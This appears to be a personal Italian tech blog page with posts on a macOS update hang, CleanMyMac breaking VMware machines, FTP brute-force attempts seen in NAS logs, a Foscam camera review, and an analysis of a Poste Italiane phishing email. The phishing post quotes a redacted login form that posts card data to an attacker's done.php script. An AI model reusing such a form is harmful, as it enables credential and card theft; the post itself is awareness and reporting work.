Il taccuino di Armando Leotta Rotating Header Image

Informatica

[MacOsX] Software Update Launcher hangs

E’ la prima volta che mi succede.

App Store segnala un aggiornamento. Fatto.

invioRichiede il riavvio. Ok, va bene adesso.

Ecco che spunta la finestra a schermo intero del software update launcher che NON fa assolutamente nulla.

Pagina grigia, solo il menu a disposizione ma si riesce solo a fare logout.

Spegni brutalmente e riprovi l’aggiornamento, anche da riga di comando: stessa finestra grigia.

Soluzione, banale ma per lo stesso motivo, imbarazzante. Premendo il tasto invio (!), parte l’aggiornamento atteso (forse una patch per questa specifica anomalia non sarebbe male, eh Apple?)

Alcuni utenti in rete hanno segnalato anche la necessità di un effettuare un reboot e poi, successivamente, dare invio alla solita finestra grigia.

Invio. Una patch complicatissima.

Mah.

[Issues] CleanMyMac e vmware fusion

Sembrava fosse un problema del tutto risolto già da tempo.

L’applicazione a cui mi riferisco è l’ottima CleanMyMac2, funzionale e dall’interfaccia gradevole.

cleanmymac

Segnalo però di prestare particolare attenzione alle eventuali macchine virtuali configurate sul vostro mac.

A valle del processo di pulizia e ottimizzazione dell’applicazione CleanMyMac 2 le macchine virtuali in stato di stop non sono più in grado di partire.

Non ho controllato specificatamente cosa avrebbe rimosso, file per file, di specifico dell’app vmware: di sicuro ha incluso di default i file temporanei necessari alla ripartenza.

 

Errore vmware durante il ripristino.

Errore vmware durante il ripristino.

Adesso vedo di trovare qualche soluzione per ripristinare le macchine.

 

Occhio.

 

Log e dintorni: 138 pagine di attacchi al daemon FTP

Un NAS casalingo, poco tempo e tanti interessi.

Questo è lo scenario di riferimento.

Questa volta spulciando i file di log ho isolato i soliti tentativi spot e improbabili del lamer di turno e quanto è rimasto ha catturato la mia attenzione : 138 pagine di tentativi di login falliti al daemon FTP.

Tutti il 30.03.14, tutti dallo stesso indirizzo IP.

FTP attack

FTP Attack (clicca per ingrandire)

Raccolgo info sull’IP. Di tutto, di più e per non farsi mancare nulla, botnet piuttosto attiva.

Mi vengono in mente le tecniche di fuzzing e le grammatiche sviluppabili su vari framework sia per scovare il buffer overflow che per sferrare l’attacco brute force o dictionary che sia.

Adesso, ringrazio della cortese attenzione ma il $token su cui ciclare è la $password, non lo $username (clicca sullo screenshot per ingrandire)

Detto questo, vedo di trovare il tempo di abilitare un ban dinamico a tempo.

 

IP CAM o network camera: ho provato due Foscam

Dopo qualche settimana di ricerche, confronti e approfondimenti mi sono deciso.

FoscamHo acquistato due IP CAM Foscam: FI9821W e la FI8910W.

Entrambe sono motorizzate e da interno, dotate di filtro I/R che migliora i colori specialmente in condizioni di scarsa luminosità, audio in/out, 802.11b/g/n (+ 10/100 eth), pan & tilt e riprese in infrarossi.

La prima è decisamente superiore: risoluzione HD con codifica H.264, visuale di 70° (invece di 60°) e memory card (caratteristiche che il secondo modello non ha).

Per contro, la 8910 è nativamente integrabile con il mio qnap (da qui la scelta di differenziare gli acquisti).

In entrambi i casi la confezione dei prodotti comprende sia le staffe per il montaggio a muro (stop compresi) sia un utilissimo eth patch cord estensibile.

La gestione e configurazione della cam avviene via web (occorre installare un plugin in dotazione disponibili per tutti i principali browser e OS).

Veniamo alla parte più interessante: la gestione e le possibilità native offerte dall’applicazione a bordo delle cam (chiaramente se volete gestirla via synology o qnap cambiano le modalità di gestione).

Le funzionalità di entrambe le applicazione di gestione sono praticamente identiche.

C’è da segnalare che quella dedicata alla camera più  evoluta è decisamente più gradevole sia come aspetto che come fruibilità.

FInestra principale

FInestra principale

 

Configurazioni

Configurazioni

 

Motion & Sound detection

Motion & Sound detection

 

Allarmi via mail

Allarmi via mail

 

 

Scatti inviati via mail

Scatti inviati via mail

 

Un bel 10 a chi indovina cosa ho in mano nell’ultima foto 😉 Cameo a parte, qualità e dimensione (36-45K max) sono più che accettabili.

Dimenticavo: entrambe hanno la possibilità di “patrol” definendo dei punti specifici da sorvegliare.

Sono molto soddisfatto degli acquisti ma aggiornerò il post sulle problematiche o novità.

NOTA: al momento, sembra che la 8910 riesca a salvare ed inviare esclusivamente immagini in MJPG (Motion JPG) e non video. Non è determinante ma approfondirò con il venditore. La 9821W invia immagini ma salva anche i video direttamente sulla SD.

 *** UPDATE ***

Anche la “piccolina” consente la registrazione video: al momento sono riuscito con altro applicativo (via qnap, ad esempio).

 

Vogliamo guardare in faccia questo #phishing? Ancora #poste

Ancora una volta gli utenti di Poste Italiane sono le vittime di un attacco di phishing.

Una mail, una delle tante che arrivano e che non sono state rilevate dai sistemi di sicurezza?

Non propriamente “una delle tante”.

Guardiamola insieme: ecco come si presenta:

NOTA: tutti i link puntano a poste.it

NOTA: tutti i link puntano a poste.it (cliccare per ingrandire)

Perchè è “ben fatta”? Perchè tutti i link puntano al sito ufficiale di poste.it.

Ripeto per i lettori frettolosi.

Tutti i link puntano a poste.it: il login in alto a destra, il registrati, i banner in basso sia a sinistra che a destra.

Tutti.

Cosa non torna?

Per accedere ai servizi online nessuno si sognerebbe di chiedere i dati di carta di credito al completo (fullz, ndr)!

E’ il caso di controllare il sorgente di questo simpatico htm.

Bingo!

Vedete quel familiarissimo tasto “Accedi”?

_______<stralcio>____

Accedi ai Servizi Online </strong></p>

<form name=”loginform1″ method=”POST” onsubmit=”javascript: return logintest(this);” action=”http://www.XXXXXXXXXX.com/.XXXXXXXX/done.php“>

_______</stralcio>____

Che meravigliosa action!

Pertanto, chi inserisce le credenziali (leggasi i propri dati completi della carta di credito postepay / bancoposta comprensivo di cvv) per “accedere” ai servizi contatta tramite l’azione quel done.php.

Bene.

Verifichiamo cosa fa questo delizioso quanto inaspettato php.

Innanzitutto notiamo se c’è dell’altro sul sito per capire anche la dimensione del fenomeno.

Qui l’attaccante, per probabile dimenticanza o per poter usare la funzionalità con qualche bot, lascia la cartella XXXXXXXX con i permessi per il listing.

Quello che trovo è decisamente un arsenale di tool di attacchi e di spam. Il tutto sfruttabile via web sfruttando le risorse del malcapitato owner del sito web opportunamente bucato.

E non solo.

Trovo un file che non vorrei avere mai trovato.

Tornando sulla pagina incriminata,  scrivendo dei dati finti nella form e completando l’operazione cliccando su “Accedi” si ha l’ennesima triste evidenza: sul server XXXXXX un file è stato appena modificato.

E’ un innocente file di testo che contiene i dati delle carte di credito di tutti gli ignari ed ingenui malcapitati clienti di Postepay/Bancoposta, comprensi quelli fittizi appena inseriti come test.

Ovviamente ho rimosso il nome reale del sito in quanto è ancora raggiungibile.

Mentre vi scrivo ho già effettuato la segnalazione sul sito della Polizia di Stato.

Brutta storia.

Spero serva a riflettere.

#awareness is the key.

_____
Clusit